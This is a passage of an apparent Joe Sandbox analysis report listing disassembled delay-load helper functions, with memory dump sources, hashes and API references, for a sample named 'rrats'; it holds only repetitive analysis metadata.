                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3bc762010cc00b081b6e77f76fca1919d1d9fde1440710bd9877bfdb1b9842d1
                                                              • Instruction ID: fe93523e5ec9f3a4486503a58dc9df15b00809a9666c04d2309ded1813ae8cd3
                                                              • Opcode Fuzzy Hash: 3bc762010cc00b081b6e77f76fca1919d1d9fde1440710bd9877bfdb1b9842d1
                                                              • Instruction Fuzzy Hash: 7DB012D12581017C3104915B5D42DF7417DC4D4F14730423FF408C12C0EC414D065432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 8ef2b9fbb1f824cdf334ecd015111d2c768f5dbec8d56e41de8a58ce387f6dd1
                                                              • Instruction ID: f6c7669dc1415293a4433488169b0e45f67f6fac5ba8c7913c4ae5ede830d6c7
                                                              • Opcode Fuzzy Hash: 8ef2b9fbb1f824cdf334ecd015111d2c768f5dbec8d56e41de8a58ce387f6dd1
                                                              • Instruction Fuzzy Hash: 4FB012D12582017C3144915A5C47DF7017DC4D4F14730423FF408C12C0E8404C455432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 215bb9d9e0bd3cee5e623ae66a816c23f333c558f73a11482b3beb79af7e0d01
                                                              • Instruction ID: 15e4632aa908a9ba996890ab619c19e7d4a5340985249459f171fec555edf6bb
                                                              • Opcode Fuzzy Hash: 215bb9d9e0bd3cee5e623ae66a816c23f333c558f73a11482b3beb79af7e0d01
                                                              • Instruction Fuzzy Hash: 55B012C16D9501BC3204610D5C07DFB014DC0C1F14730833FF508C02C0E8404C495432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f1027a1eb4d5e28a100a5d01c42bd13dc65e1ea3aafe6e46e0ae9c0d9ab4d8e3
                                                              • Instruction ID: fafa3a465d079c30c29d40b6a3d02ebc307569c83f9581d15f177bb59908ca4e
                                                              • Opcode Fuzzy Hash: f1027a1eb4d5e28a100a5d01c42bd13dc65e1ea3aafe6e46e0ae9c0d9ab4d8e3
                                                              • Instruction Fuzzy Hash: BAB012C12D9401BC310421291C06DFB010DC0C1F14B30413FF514C05C1A8804D095432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9278a8a13005ac555b434f3ea9b7a3c27eb6bc01c060830acc4fa82336037de4
                                                              • Instruction ID: 0228ed40fabd33c4f4a8314d532303b2a699ee7af6ff45f610f19da15f12ad78
                                                              • Opcode Fuzzy Hash: 9278a8a13005ac555b434f3ea9b7a3c27eb6bc01c060830acc4fa82336037de4
                                                              • Instruction Fuzzy Hash: 63B012C12D9442BD3104620E1D02DFB054DC0C1F14730813FF608C02C0E8414C065432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b74eb7f6e8b16a61f2316c10cc3e6315dacd26c74a3bce4a4b89ece2c24c9a09
                                                              • Instruction ID: 76b5c944bf7224b5abe0ce3103314622401957d7397bc53fe74b86fc8d7b008c
                                                              • Opcode Fuzzy Hash: b74eb7f6e8b16a61f2316c10cc3e6315dacd26c74a3bce4a4b89ece2c24c9a09
                                                              • Instruction Fuzzy Hash: A9B012C16D9401FC3104A10D5C02DFB024DC1C5F14730823FF908C02C0E8408C055432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c35b3e89e558720021c4ae216410512c7f7cdf94dc4ef96509d03a5f9424f6bb
                                                              • Instruction ID: 391aebd2470cfeb1def2727f12d33a6777626d6dd278d4269ce127717c2a6ffc
                                                              • Opcode Fuzzy Hash: c35b3e89e558720021c4ae216410512c7f7cdf94dc4ef96509d03a5f9424f6bb
                                                              • Instruction Fuzzy Hash: 6CB012C12D9401BE3104620D1C02EFB014DC0C1F14730413FF508C02C0E8404C095432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 343a50dee50dd2ab0461675546b854fcd8e48ca690a3688a963b5b671772fbdd
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 343a50dee50dd2ab0461675546b854fcd8e48ca690a3688a963b5b671772fbdd
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5c02a0c3255612935286deb5e843c401cdfc3d69b522b37c4f918f54390c3314
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 5c02a0c3255612935286deb5e843c401cdfc3d69b522b37c4f918f54390c3314
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f8d5455651922a69de391e34ac36ec20c49933b600b482330fd56e2e8c93a5f7
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: f8d5455651922a69de391e34ac36ec20c49933b600b482330fd56e2e8c93a5f7
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 6b94d124fe68e2af3fe792b5b8548ab9bd12068c4969abef2cd4b8116be88ae0
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 6b94d124fe68e2af3fe792b5b8548ab9bd12068c4969abef2cd4b8116be88ae0
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5683f5fa2d9626c37b937b8c1613e826389c1a83fe18cdce2ef31e3dd27db669
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 5683f5fa2d9626c37b937b8c1613e826389c1a83fe18cdce2ef31e3dd27db669
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c63312fa77354543997a78457c40293544c7e703447cce3e4703c0bf070e177c
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: c63312fa77354543997a78457c40293544c7e703447cce3e4703c0bf070e177c
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 31211973cf3c33849dbd6b971c243b4fd8330c833b68e3e515827bc9ad06f13e
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 31211973cf3c33849dbd6b971c243b4fd8330c833b68e3e515827bc9ad06f13e
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e7ee85e613b45c66352e929dc40d4c8a21ca593af93a097ecc526be381505cc0
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: e7ee85e613b45c66352e929dc40d4c8a21ca593af93a097ecc526be381505cc0
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
